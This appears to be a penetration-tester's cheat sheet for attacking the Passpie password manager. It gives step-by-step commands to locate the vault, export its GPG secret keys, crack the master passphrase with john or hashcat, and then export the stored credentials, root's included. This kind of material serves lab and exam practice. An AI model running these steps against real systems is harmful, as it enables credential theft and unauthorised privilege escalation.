Skip to content

Passpie Exploitation

What is Passpie?

  • Command-line password manager using GPG encryption with master passphrase
  • Stores credentials in .passpie directory
  • Uses GnuPG to encrypt data

Common Attack Vector: GPG Key Cracking

  • Locate Passpie Database
    • find / -type d -name ".passpie" 2>/dev/null # Usually in user's home: ~/.passpie/
  • Look for: .keys (GPG keyring)
  • Export GPG Key
    • If you see a .keys and .config folder - OLDER VERSIONS of Passpie
      • ![[../../../attachments/Pasted image 20251012160134.png]]
      • gpg --homedir ~/.passpie/.keys --list-secret-keys - list keys
      • gpg --homedir ~/.passpie/.keys --export-secret-keys -a > private.key - get private key
    • If you see .keys and .config files - NEWER VERSIONS of Passpie
      • ![[../../../attachments/Pasted image 20251012160212.png]]
      • Send them to KALI
    • Remove the PGP Public Key portion from this key file
  • Convert to John Format
    • gpg2john private.key > passpie.hash
      • Or if you have the .keys directory
    • gpg2john ~/.passpie/.keys/* > passpie.hash
  • Crack with John/Hashcat
    • john --wordlist=/usr/share/wordlists/rockyou.txt passpie.hash
      • OR hashcat mode 17010 for GPG
    • hashcat -m 17010 -a 0 passpie.hash /usr/share/wordlists/rockyou.txt
    • You will get the passphrase for passpie
  • Access Passpie Database - Once passphrase cracked
    • passpie list - list available creds
    • passpie export passwords.txt - might have to run in /tmp
    • passpie copy root@target - copy specific password

Common Locations: - ~/.passpie/ - Database directory - ~/.passpie/.keys/ - GPG keyring - ~/.passpie/.config - Configuration